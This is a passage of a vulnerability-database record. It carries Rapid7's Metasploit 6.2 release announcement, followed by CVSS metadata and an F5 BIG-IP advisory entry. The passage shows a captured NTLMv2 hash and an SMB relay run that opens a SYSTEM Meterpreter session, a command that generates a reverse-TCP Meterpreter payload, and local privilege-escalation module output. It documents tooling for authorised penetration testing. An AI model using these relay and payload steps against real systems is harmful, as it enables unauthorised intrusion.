admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T18:00:21", "description": "A remote code execution vulnerability exists in F5 BIG-IP devices. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2021-22986; CVE-2021-22987; CVE-2022-1388)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2022-1388"], "modified": "2022-06-13T00:00:00", "id": "CPAI-2021-0198", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}